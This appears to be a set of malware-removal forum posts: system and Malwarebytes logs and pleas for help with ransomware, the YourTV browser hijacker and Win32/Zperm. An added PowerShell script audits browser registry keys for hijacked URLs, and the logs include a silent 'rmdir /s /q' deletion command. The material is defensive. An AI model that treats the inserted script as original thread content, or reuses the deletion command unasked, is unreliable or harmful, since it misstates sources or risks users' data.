2016-11-02 11:08:01 111968 ----a-w- C:\WINDOWS\SysWow64\NetSetupApi.dll
2016-11-02 11:08:00 602464 ----a-w- C:\WINDOWS\SysWow64\NetSetupEngine.dll
2016-11-02 11:05:53 6657176 ----a-w- C:\WINDOWS\SysWow64\Windows.Media.Protection.PlayReady.dll
2016-11-02 11:05:40 951904 ----a-w- C:\WINDOWS\SysWow64\mfsvr.dll
2016-11-02 11:05:29 405856 ----a-w- C:\WINDOWS\System32\msv1_0.dll
2016-11-02 11:05:13 959112 ----a-w- C:\WINDOWS\SysWow64\ole32.dll
2016-11-02 11:04:46 596832 ----a-w- C:\WINDOWS\SysWow64\comctl32.dll
2016-11-02 11:04:36 4312248 ----a-w- C:\WINDOWS\SysWow64\explorer.exe
2016-11-02 11:04:08 2678056 ----a-w- C:\WINDOWS\System32\d3d10warp.dll
2016-11-02 11:02:55 682816 ----a-w- C:\WINDOWS\System32\wer.dll
2016-11-02 11:02:53 238056 ----a-w- C:\WINDOWS\System32\weretw.dll
2016-11-02 11:02:31 848736 ----a-w- C:\WINDOWS\System32\NetSetupEngine.dll
2016-11-02 11:02:31 148832 ----a-w- C:\WINDOWS\System32\NetSetupApi.dll
2016-11-02 11:01:37 1425000 ----a-w- C:\WINDOWS\SysWow64\d3d9.dll
2016-11-02 11:01:31 276832 ----a-w- C:\WINDOWS\SysWow64\input.dll
2016-11-02 11:01:30 1415744 ----a-w- C:\WINDOWS\SysWow64\gdi32full.dll
2016-11-02 11:01:28 545936 ----a-w- C:\WINDOWS\SysWow64\fontdrvhost.exe
2016-11-02 11:01:20 1263856 ----a-w- C:\WINDOWS\SysWow64\msctf.dll
2016-11-02 11:01:00 92512 ----a-w- C:\WINDOWS\System32\rdpudd.dll
2016-11-02 11:00:30 8156080 ----a-w- C:\WINDOWS\System32\Windows.Media.Protection.PlayReady.dll
2016-11-02 11:00:17 534096 ----a-w- C:\WINDOWS\System32\AudioEng.dll
2016-11-02 11:00:17 1061968 ----a-w- C:\WINDOWS\System32\mfsvr.dll
2016-11-02 11:00:06 1274712 ----a-w- C:\WINDOWS\System32\ole32.dll
2016-11-02 10:59:45 4673304 ----a-w- C:\WINDOWS\explorer.exe
2016-11-02 10:56:52 1609920 ----a-w- C:\WINDOWS\System32\d3d9.dll
2016-11-02 10:56:50 322912 ----a-w- C:\WINDOWS\System32\input.dll
2016-11-02 10:56:42 1572768 ----a-w- C:\WINDOWS\System32\gdi32full.dll
2016-11-02 10:56:39 628552 ----a-w- C:\WINDOWS\System32\fontdrvhost.exe
2016-11-02 10:56:38 1418312 ----a-w- C:\WINDOWS\System32\msctf.dll
2016-11-02 10:55:52 48992 ----a-w- C:\WINDOWS\System32\drivers\iorate.sys
2016-11-02 10:50:35 34304 ----a-w- C:\WINDOWS\SysWow64\LaunchWinApp.exe
2016-11-02 10:49:47 37376 ----a-w- C:\WINDOWS\SysWow64\atmlib.dll
2016-11-02 10:49:42 147968 ----a-w- C:\WINDOWS\SysWow64\win32k.sys
2016-11-02 10:49:20 32768 ----a-w- C:\WINDOWS\apppatch\AcWinRT.dll
2016-11-02 10:48:56 32768 ----a-w- C:\WINDOWS\SysWow64\efsext.dll
2016-11-02 10:48:24 88064 ----a-w- C:\WINDOWS\apppatch\AcXtrnal.dll
2016-11-02 10:48:00 95232 ----a-w- C:\WINDOWS\SysWow64\TSpkg.dll
2016-11-02 10:47:36 156672 ----a-w- C:\WINDOWS\SysWow64\BcastDVRHelper.dll
2016-11-02 10:47:26 47104 ----a-w- C:\WINDOWS\SysWow64\Windows.Shell.Search.UriHandler.dll
2016-11-02 10:47:04 285184 ----a-w- C:\WINDOWS\SysWow64\Windows.UI.BlockedShutdown.dll
2016-11-02 10:46:26 140288 ----a-w- C:\WINDOWS\SysWow64\AppCapture.dll
2016-11-02 10:45:49 253952 ----a-w- C:\WINDOWS\SysWow64\Windows.UI.BioFeedback.dll
2016-11-02 10:45:37 331776 ----a-w- C:\WINDOWS\apppatch\AcLayers.dll
2016-11-02 10:45:17 492032 ----a-w- C:\WINDOWS\SysWow64\bcastdvr.exe
2016-11-02 10:45:09 182784 ----a-w- C:\WINDOWS\SysWow64\mfsensorgroup.dll
2016-11-02 10:44:50 231936 ----a-w- C:\WINDOWS\SysWow64\Windows.ApplicationModel.LockScreen.dll
2016-11-02 10:44:45 180224 ----a-w- C:\WINDOWS\SysWow64\InstallAgent.exe
2016-11-02 10:44:34 89088 ----a-w- C:\WINDOWS\SysWow64\AuthExt.dll
2016-11-02 10:43:53 557568 ----a-w- C:\WINDOWS\SysWow64\StoreAgent.dll
2016-11-02 10:43:43 198144 ----a-w- C:\WINDOWS\SysWow64\FSClient.dll
2016-11-02 10:43:29 731136 ----a-w- C:\WINDOWS\SysWow64\d3d8.dll
2016-11-02 10:42:55 549376 ----a-w- C:\WINDOWS\SysWow64\ActionCenterCPL.dll
2016-11-02 10:42:48 223232 ----a-w- C:\WINDOWS\SysWow64\InstallAgentUserBroker.exe
2016-11-02 10:42:44 306176 ----a-w- C:\WINDOWS\SysWow64\ieproxy.dll
2016-11-02 10:42:35 202752 ----a-w- C:\WINDOWS\SysWow64\Windows.Devices.HumanInterfaceDevice.dll
2016-11-02 10:42:32 866816 ----a-w- C:\WINDOWS\SysWow64\Windows.UI.Cred.dll
2016-11-02 10:42:22 506880 ----a-w- C:\WINDOWS\SysWow64\DevicePairing.dll
2016-11-02 10:42:19 632832 ----a-w- C:\WINDOWS\SysWow64\sud.dll
2016-11-02 10:41:26 635904 ----a-w- C:\WINDOWS\SysWow64\jscript9diag.dll
2016-11-02 10:40:36 896512 ----a-w- C:\WINDOWS\SysWow64\fontext.dll
2016-11-02 10:40:34 198656 ----a-w- C:\WINDOWS\SysWow64\indexeddbserver.dll
2016-11-02 10:40:21 548352 ----a-w- C:\WINDOWS\SysWow64\ddraw.dll
2016-11-02 10:39:53 236544 ----a-w- C:\WINDOWS\SysWow64\UIAnimation.dll
2016-11-02 10:39:24 348672 ----a-w- C:\WINDOWS\SysWow64\zipfldr.dll
2016-11-02 10:39:06 465920 ----a-w- C:\WINDOWS\SysWow64\LockAppBroker.dll
2016-11-02 10:38:52 760832 ----a-w- C:\WINDOWS\SysWow64\appwiz.cpl
2016-11-02 10:38:35 22563840 ----a-w- C:\WINDOWS\System32\edgehtml.dll
2016-11-02 10:37:46 19415040 ----a-w- C:\WINDOWS\SysWow64\edgehtml.dll
2016-11-02 10:37:08 299008 ----a-w- C:\WINDOWS\System32\rdpinit.exe
2016-11-02 10:36:53 415744 ----a-w- C:\WINDOWS\System32\rdpshell.exe
2016-11-02 10:36:34 7626752 ----a-w- C:\WINDOWS\SysWow64\twinui.dll
2016-11-02 10:36:05 63488 ----a-w- C:\WINDOWS\SysWow64\ErrorDetailsUpdate.dll
2016-11-02 10:35:13 336896 ----a-w- C:\WINDOWS\SysWow64\msinfo32.exe
2016-11-02 10:34:44 327168 ----a-w- C:\WINDOWS\System32\microsoft-windows-system-events.dll
2016-11-02 10:34:23 43008 ----a-w- C:\WINDOWS\System32\LaunchWinApp.exe
2016-11-02 10:34:11 15360 ----a-w- C:\WINDOWS\apppatch\apppatch64\AcXtrnal.dll
2016-11-02 10:33:56 206848 ----a-w- C:\WINDOWS\System32\win32k.sys
2016-11-02 10:33:48 3307520 ----a-w- C:\WINDOWS\SysWow64\MFMediaEngine.dll
2016-11-02 10:33:42 32768 ----a-w- C:\WINDOWS\apppatch\apppatch64\AcWinRT.dll
.
============= FINISH: 2:47:21.16 ===============

Attached Files: attach.txt (17.3 KB)

I can't get rid of this pop-up browser bar; I've tried everything I know

Hi guys, when I try typing on Google or anything it jumps to a pop-up toolbar, but I can't find anything unusual installed or anything odd in my files. Just wondering if you knew what it was; I've tried all the free malware tools but nothing.



Also, this pop-up happens all the time: 27.11.2016 21.08.39;Dangerous URL blocked;Redirect listed in database of malicious URLs;Google Chrome;11/27/2016 21:08:39

Ransomware

I believe my computer has been infected with ransomware called Locky. It has encrypted all of my Word files, and there's a ransom note. I have no intention of paying the blackmailers, and am hoping someone here might know how to deal with the problem. There are companies purporting to have remedies, but I have no idea whether or not any of them are effective. Any help will be appreciated. Here are screenshots of the .doc properties, the page identifying the malware, and the ransom note. Thanks in advance.

Attached thumbnails: WordFail.jpg (105.3 KB), LockyID.jpg (219.8 KB), RansomNote.jpg (187.1 KB)

Windows 10 Chrome - "YourTV" Browser hijacker won't go away

So, around early yesterday I noticed that my Google Chrome has been infected with one of those scumbag browser hijackers, one by the innocent name of "YourTV". What the program does is forcibly change my homepage and default search engine to some broken, ad-spammed version of Google and prevent me from changing my default search engine (my computer insists that the current one is "enforced by the administrator") or default home page (the changes here are made through a registry file, and editing Chrome settings does nothing to fix it), as well as various other irritating things.

Now, after googling the issue, it seemed that removing this hijacker from my computer should be a fairly straightforward matter: Delete any potentially suspicious files from the computer, reset Chrome settings, scan with Malwarebytes, badda-boom-badda-bing, done.

Or so I thought...

I've been running into a lot of issues regarding this software and I'm starting to get very, very frustrated.

I'll list all the things that I've tried that haven't worked:
  • Searching for suspicious programs or files - I haven't installed anything to my memory since this hijacker showed up, and there are no odd or suspicious programs that I can locate through conventional search methods.
  • Resetting Chrome's settings - This does literally nothing.
  • Deleting registry entries referring to the hijacker - Again, does nothing.
  • Scanning with Windows Defender - Doesn't detect anything.
  • Scanning with Malwarebytes - This does detect the YourTV crap on my computer and removes it accordingly, but the moment I boot up Chrome again, it comes right back.
  • Booting my computer in Safe Mode and then doing a full, no-holds-barred custom scan with Malwarebytes - Again, this detected the same files (which I must have deleted about 4 times now) but again, coming back online on Chrome brings this scumbag of a program right back.
  • Removing the malware with Malwarebytes then reinstalling Chrome - A fresh install did approximately nothing to fix the issue.

Can somebody please help me? I'm at my wits' end here and I get more and more frustrated the more I see just how offensively deep this hijack program has gotten its claws into my computer.

Also, it's worth mentioning that when I scan with Malwarebytes, it picks up a trojan software piece hiding in "C:\ProgramData\Mozilla\Mozilla Firefox"... The weird thing about this? Well, excluding the fact that I've never actually installed Firefox on this computer once in its lifetime, I also can't ever seem to find this folder on my own. Neither before nor after Malwarebytes picks it up.

And just in case it helps, here's a full log of what Malwarebytes picks up every time I scan:

Code:

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 1/12/2016
Scan Time: 1:57 PM
Logfile: log.txt
Administrator: Yes

Version: 2.2.1.1043
Malware Database: v2016.12.01.03
Rootkit Database: v2016.11.20.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled

OS: Windows 10
CPU: x64
File System: NTFS
User: nszme

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 362649
Time Elapsed: 4 min, 59 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 1
PUP.Optional.YourTV.ChrPRST, HKU\S-1-5-21-2845599095-3938741188-173153177-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472F-A0FF-E1416B8B2E3A}, , [889fab37673352e46178334649b922de],

Registry Values: 1
PUP.Optional.YourTV.ChrPRST, HKU\S-1-5-21-2845599095-3938741188-173153177-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}|URL, http://www.google.com/cse?cx=partner-pub-8036109189802438[889fab37673352e46178334649b922de]A7790813904&ie=UTF-8&q={searchTerms}&sa=Search&siteurl=yourtv.linkF, %4, %5

Registry Data: 1
PUP.Optional.YourTV.ChrPRST, HKU\S-1-5-21-2845599095-3938741188-173153177-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN|Start Page, http://yourtv.link, Good: (www.google.com), Bad: (http://yourtv.link),,[66c16f7323771620d01902225aa933cd]

Folders: 0
(No malicious items detected)

Files: 1
Trojan.Agent, C:\ProgramData\Mozilla\Mozilla Firefox.exe, , [d255667c8e0c91a51b4cc24709f9e61a],

Physical Sectors: 0
(No malicious items detected)


(end)

It's always those four files. One trojan, 3 PUPs, and deleting them just seems to make them come back the next time I start up Chrome.

Interestingly, though, this hijacker doesn't seem to be affecting Microsoft Edge, for whatever reason...

Anyways, if anybody could help me out, I'd be greatly appreciative.

Thank you!
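
Since Chrome only reports a setting as "enforced by your administrator" when it comes from a policy registry key, and Malwarebytes keeps flagging the same IE Start Page and SearchScopes values, the defender's move is to audit those keys directly instead of relying on Chrome's own reset. The read-only PowerShell audit below is an added example, not code from the thread or from Malwarebytes; its allowlist is a constructed sample, and the Chrome policy value names it reads (HomepageLocation, DefaultSearchProviderSearchURL, NewTabPageLocation, RestoreOnStartupURLs, ExtensionInstallForcelist) are assumed from Chrome's published policy list.

```powershell
# Read-only audit of the browser settings a hijacker like YourTV plants. Added example,
# not code from the thread or from Malwarebytes. Assumptions: Chrome reads policy from
# HKLM/HKCU\SOFTWARE\Policies\Google\Chrome; the allowlist below is a constructed sample.

# Hosts a search/homepage URL is allowed to point at (constructed; adjust to your baseline).
$AllowedHosts = @('www.google.com', 'www.bing.com', 'duckduckgo.com')

function Test-AllowedUrl {
    param([string]$Url)
    try { $u = [System.Uri]$Url } catch { return $false }
    if ($AllowedHosts -notcontains $u.Host) { return $false }
    # A trusted host is not enough: the flagged SearchScopes URL in the log above sits on
    # www.google.com but is a Custom Search Engine (/cse, cx=, siteurl=) that sends the
    # query to the hijacker's site. Treat such URLs as unexpected.
    if ($u.AbsolutePath -like '/cse*') { return $false }
    if ($u.Query -match '(^|[?&])(cx|siteurl)=') { return $false }
    return $true
}

function Add-Finding {
    param([System.Collections.ArrayList]$List, [string]$Source, [string]$Value, [bool]$Allowed)
    [void]$List.Add([pscustomobject]@{ Source = $Source; Value = $Value; Allowed = $Allowed })
}

$findings = [System.Collections.ArrayList]::new()

# 1. Chrome policy values. Settings from these keys are what Chrome labels
#    "enforced by your administrator", the symptom described in the post.
$urlPolicies = 'HomepageLocation', 'DefaultSearchProviderSearchURL', 'NewTabPageLocation'
foreach ($root in 'HKLM:\SOFTWARE\Policies\Google\Chrome', 'HKCU:\SOFTWARE\Policies\Google\Chrome') {
    if (-not (Test-Path $root)) { continue }
    $props = Get-ItemProperty -Path $root
    foreach ($name in $urlPolicies) {
        $val = $props.$name
        if ($val) { Add-Finding $findings "$root\$name" $val (Test-AllowedUrl $val) }
    }
    # List-valued policies live in subkeys with numbered values ("1", "2", ...).
    # Any forced extension is reported as unexpected; startup URLs go through the allowlist.
    foreach ($sub in 'RestoreOnStartupURLs', 'ExtensionInstallForcelist') {
        $subKey = Join-Path $root $sub
        if (-not (Test-Path $subKey)) { continue }
        (Get-ItemProperty -Path $subKey).PSObject.Properties |
            Where-Object { $_.Name -match '^\d+$' } |
            ForEach-Object {
                $ok = ($sub -eq 'RestoreOnStartupURLs') -and (Test-AllowedUrl $_.Value)
                Add-Finding $findings "$subKey\$($_.Name)" $_.Value $ok
            }
    }
}

# 2. The IE keys Malwarebytes flagged in the log above: Main\Start Page and each
#    SearchScopes\{GUID}\URL under the current user.
$ieMain = 'HKCU:\SOFTWARE\Microsoft\Internet Explorer\Main'
if (Test-Path $ieMain) {
    $sp = (Get-ItemProperty -Path $ieMain).'Start Page'
    if ($sp) { Add-Finding $findings "$ieMain\Start Page" $sp (Test-AllowedUrl $sp) }
}
$scopes = 'HKCU:\SOFTWARE\Microsoft\Internet Explorer\SearchScopes'
if (Test-Path $scopes) {
    foreach ($scope in Get-ChildItem -Path $scopes) {
        $url = (Get-ItemProperty -Path $scope.PSPath).URL
        if ($url) { Add-Finding $findings "$($scope.Name)\URL" $url (Test-AllowedUrl $url) }
    }
}

# Unexpected entries sort first; nothing is modified, so the output can be reviewed
# before deciding what a cleanup tool should remove.
$findings | Sort-Object Allowed | Format-Table -AutoSize -Wrap
"Unexpected entries: $(@($findings | Where-Object { -not $_.Allowed }).Count)"
```

Running it before and after a Malwarebytes scan shows whether the values are being recreated, which is the behaviour the post describes and points at a persistence mechanism outside these keys.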

Infected by Osiris ransomware

I have received this Osiris ransomware on my computer and it has encrypted my photos so I can't open them. I followed the manual guide to get rid of the annoying thing but it doesn't seem to work. Is there a better, effective guide? Please, anyone, help.

Win32/Zperm virus & popups.

My AVG antivirus has been periodically flagging a 'threat' called win32/zperm. It appears to be in C:\Windows\temp\. I always click remove and it says it's successful, but periodically it returns.

I also have the issue of various pop-ups while browsing the internet in Firefox (it's the only browser I use). Anything from "this computer has been locked due to suspicious activity, call this number to reactivate" to various random pop-ups.

Before coming here I've tried updating and running in Safe Mode: AVG AntiVirus, Malwarebytes, Spybot S&D and Ad-Aware. They either don't find a threat or one of them finds 'tracking cookies', which it removes but which doesn't fix the problem.


I ran DDS and attached the two required text files. I've moved since I purchased this computer, so I'm not entirely sure where my Windows disk is. I'm on Windows 10 Home 64-bit if it matters. Any help would be appreciated, thanks.

DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 11.0.14393.0 BrowserJavaVersion: 11.91.2
Run by Nicholas at 12:28:54 on 2016-12-22
Microsoft Windows 10 Home 10.0.14393.0.1252.1.1033.18.8102.2929 [GMT -6:00]
.
AV: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: AVG AntiVirus Free Edition *Enabled/Updated* {4D41356F-32AD-7C42-C820-63775EE4F413}
SP: Spybot - Search and Destroy *Enabled/Outdated* {A16C3F68-9280-E053-1818-342707FECF4D}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: AVG AntiVirus Free Edition *Enabled/Updated* {F620D48B-1497-73CC-F290-58052563BEAE}
.
============== Running Processes ===============
.
c:\PROGRA~2\AVG\Av\avgrsa.exe
C:\Program Files (x86)\AVG\Av\avgcsrva.exe
C:\WINDOWS\system32\svchost.exe -k DcomLaunch
C:\WINDOWS\system32\svchost.exe -k RPCSS
C:\WINDOWS\system32\dwm.exe
C:\WINDOWS\system32\svchost.exe -k LocalService
C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\WINDOWS\system32\svchost.exe -k LocalServiceNetworkRestricted
C:\WINDOWS\system32\svchost.exe -k LocalServiceNoNetwork
C:\Program Files (x86)\AVG Web TuneUp\WtuSystemSupport.exe
C:\WINDOWS\System32\svchost.exe -k NetworkService
C:\WINDOWS\system32\svchost.exe -k netsvcs
C:\WINDOWS\system32\igfxCUIService.exe
C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\WINDOWS\system32\svchost.exe -k LocalServiceNetworkRestricted
C:\WINDOWS\system32\svchost.exe -k LocalSystemNetworkRestricted
C:\WINDOWS\System32\spoolsv.exe
C:\WINDOWS\system32\WLANExt.exe
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\Program Files (x86)\ASUS\WebStorage\2.0.3.226\AsusWSWinService.exe
C:\WINDOWS\System32\svchost.exe -k utcsvc
C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files (x86)\AVG\Framework\Common\avgsvca.exe
C:\WINDOWS\system32\BtwRSupportService.exe
C:\Program Files (x86)\AVG\Av\avgwdsvca.exe
C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.14.1023.10544\AdAwareService.exe
C:\Program Files\Intel\iCLS Client\HeciServer.exe
C:\WINDOWS\system32\DptfPolicyCriticalService.exe
C:\WINDOWS\system32\DptfPolicyConfigTDPService.exe
C:\WINDOWS\system32\DptfParticipantProcessorService.exe
C:\Program Files\CyberLink\Shared files\RichVideo64.exe
C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe
C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe
C:\WINDOWS\system32\svchost.exe -k appmodel
C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\40.3.6\ToolbarUpdater.exe
C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe
C:\Program Files (x86)\AVG\Av\avgnsa.exe
C:\Program Files (x86)\AVG\Av\avgemca.exe
C:\WINDOWS\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\WINDOWS\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Program Files (x86)\Common Files\MAGIX Services\Database\bin\FABS.exe
C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
C:\WINDOWS\system32\SearchIndexer.exe
C:\WINDOWS\system32\sihost.exe
C:\WINDOWS\system32\svchost.exe -k UnistackSvcGroup
C:\WINDOWS\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe
C:\Windows\System32\RuntimeBroker.exe
C:\Program Files (x86)\ASUS\ASUS Manager\Application Update\ASUSUpdateChecker.exe
C:\Program Files (x86)\ASUS\ASUS Manager\Power Manager\Power Manager_background.exe
C:\Program Files (x86)\InstallShield Installation Information\{9AF45D7C-34F1-4BA0-B799-825C8C04494C}\AiChargerDT.exe
C:\WINDOWS\system32\taskhostw.exe
C:\Program Files (x86)\ASUS\ASUS Manager\AsHKService.exe
C:\Program Files (x86)\ASUS\ASUS Manager\Ai Charger II\Ai_ChargerII_TrayIcon(ASUS_Manager).exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\igfxEM.exe
C:\WINDOWS\system32\igfxHK.exe
C:\WINDOWS\system32\igfxTray.exe
C:\WINDOWS\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
C:\Program Files (x86)\ASUS\ASUS Key Suite\AsKeySuite.exe
C:\Program Files\Common Files\microsoft shared\ink\TabTip.exe
C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\TabTip32.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe
C:\WINDOWS\system32\SettingSyncHost.exe
C:\WINDOWS\system32\wbem\unsecapp.exe
C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.14.1023.10544\AdAwareTray.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\WINDOWS\system32\fontdrvhost.exe
C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe
C:\Program Files (x86)\AVG\Av\avgui.exe
C:\Program Files (x86)\AVG\Framework\Common\avguix.exe
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe
C:\Program Files (x86)\AVG Web TuneUp\vprot.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files (x86)\ASUS\WebStorage\2.0.3.226\AsusWSPanel.exe
C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.10.145.0_x64__kzf8qxf38zg5c\SkypeHost.exe
C:\WINDOWS\system32\ApplicationFrameHost.exe
C:\Program Files\WindowsApps\Microsoft.Getstarted_4.2.29.0_x64__8wekyb3d8bbwe\WhatsNew.Store.exe
C:\WINDOWS\system32\taskhostw.exe
C:\Windows\System32\SystemSettingsBroker.exe
C:\Program Files\WindowsApps\Microsoft.BingNews_4.18.37.0_x86__8wekyb3d8bbwe\Microsoft.Msn.News.exe
C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7714.42037.0_x64__8wekyb3d8bbwe\HxCalendarAppImm.exe
C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7714.42037.0_x64__8wekyb3d8bbwe\HxTsr.exe
C:\Users\Nicholas\AppData\Local\Microsoft\OneDrive\OneDrive.exe
C:\WINDOWS\system32\dashost.exe
C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1612.3341.0_x64__8wekyb3d8bbwe\Calculator.exe
C:\WINDOWS\System32\sdiagnhost.exe
C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.1118.10000.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe
C:\Program Files\WindowsApps\Microsoft.XboxApp_24.24.20004.0_x64__8wekyb3d8bbwe\XboxApp.exe
C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.16112.10221.0_x64__8wekyb3d8bbwe\Video.UI.exe
C:\Program Files (x86)\Mozilla Firefox\firefox.exe
C:\WINDOWS\system32\AUDIODG.EXE
C:\Windows\System32\smartscreen.exe
svchost.exe
C:\WINDOWS\system32\SearchProtocolHost.exe
C:\WINDOWS\system32\SearchFilterHost.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe
C:\WINDOWS\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxps://mysearch.avg.com/?cid={157D7AC9-D0D0-481F-A902-B516EE3FECF4}&mid=3cb132cf36e047cda1d2856e5810e0fe-b77f08a324e953ddc3fee54571f6df06071efe63&lang=en&ds=AVG&coid=avgtbavg&cmpid=1116av&pr=fr&d=2015-07-16 12:21:27&v=4.3.6.255&pid=wtu&sg=&sap=hp
BHO: Java(tm) Plug-In SSV Helper: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre1.8.0_91\bin\ssv.dll
BHO: AVG Web TuneUp: {95B7759C-8C7F-4BF1-B163-73684A933233} - C:\Program Files (x86)\AVG Web TuneUp\4.3.6.255\AVG Web TuneUp.dll
BHO: Java(tm) Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre1.8.0_91\bin\jp2ssv.dll
uRun: [OneDrive] "C:\Users\Nicholas\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
uRun: [SpybotPostWindows10UpgradeReInstall] "C:\Program Files\Common Files\AV\Spybot - Search and Destroy\Test.exe"
uRunOnce: [Uninstall 17.3.6517.0809_1\amd64] C:\WINDOWS\System32\cmd.exe /q /c rmdir /s /q "C:\Users\Nicholas\AppData\Local\Microsoft\OneDrive\17.3.6517.0809_1\amd64"
uRunOnce: [Uninstall 17.3.6517.0809_1] C:\WINDOWS\System32\cmd.exe /q /c rmdir /s /q "C:\Users\Nicholas\AppData\Local\Microsoft\OneDrive\17.3.6517.0809_1"
mRun: [ASUSPRP] "C:\Program Files (x86)\ASUS\APRP\APRP.EXE"
mRun: [WebStorage] C:\Program Files (x86)\ASUS\WebStorage\2.0.3.226\ASUSWSLoader.exe
mRun: [RemoteControl10] "C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe"
mRun: [DivXMediaServer] C:\Program Files (x86)\DivX\DivX Media Server\DivXMediaServer.exe
mRun: [AVG_UI] "C:\Program Files (x86)\AVG\Framework\Common\avguirna.exe" /lps=av
mRun: [AvgUi] "C:\Program Files (x86)\AVG\Framework\Common\avguirna.exe" /lps=fmw
mRun: [SunJavaUpdateSched] "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
mRun: [SDTray] "C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe"
mRun: [vProt] "C:\Program Files (x86)\AVG Web TuneUp\vprot.exe"
dRunOnce: [Application Restart #1] C:\Program Files\Common Files\microsoft shared\ink\TabTip.exe /Crashed
mPolicies-System: DSCAutomationHostEnabled = dword:2
TCP: NameServer = 192.168.1.254
TCP: Interfaces\{548618f6-a406-4e10-834b-9f87371363d5} : DHCPNameServer = 127.0.0.1
TCP: Interfaces\{77123f7f-96e7-4422-9e25-6ecb601d7a1a} : DHCPNameServer = 192.168.1.254
Handler: tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll
Handler: windows.tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll
Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
Notify: SDWinLogon - SDWinLogon.dll
SSODL: WebCheck - <orphaned>
LSA: Security Packages = ""
mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "C:\Program Files (x86)\Google\Chrome\Application\55.0.2883.87\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
CLSID: {603D3801-BD81-11d0-A3A5-00C04FD706EC} - C:\WINDOWS\System32\windows.storage.dll
x64-mStart Page = about:blank
x64-BHO: AVG Web TuneUp: {95B7759C-8C7F-4BF1-B163-73684A933233} - C:\Program Files\AVG Web TuneUp\4.3.6.255\AVG Web TuneUp.dll
x64-Run: [RTHDVCPL] "C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe" -s
x64-Run: [RtHDVBg] "C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe" /MAXX4
x64-Run: [DptfPolicyLpmServiceHelper] C:\WINDOWS\System32\DptfPolicyLpmServiceHelper.exe
x64-Run: [IgfxTray] "C:\WINDOWS\System32\igfxtray.exe"
x64-Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
x64-Run: [Logitech Download Assistant] C:\WINDOWS\System32\rundll32.exe C:\WINDOWS\System32\LogiLDA.dll,LogiFetch
x64-Run: [AdAwareTray] "C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.14.1023.10544\AdAwareTray.exe"
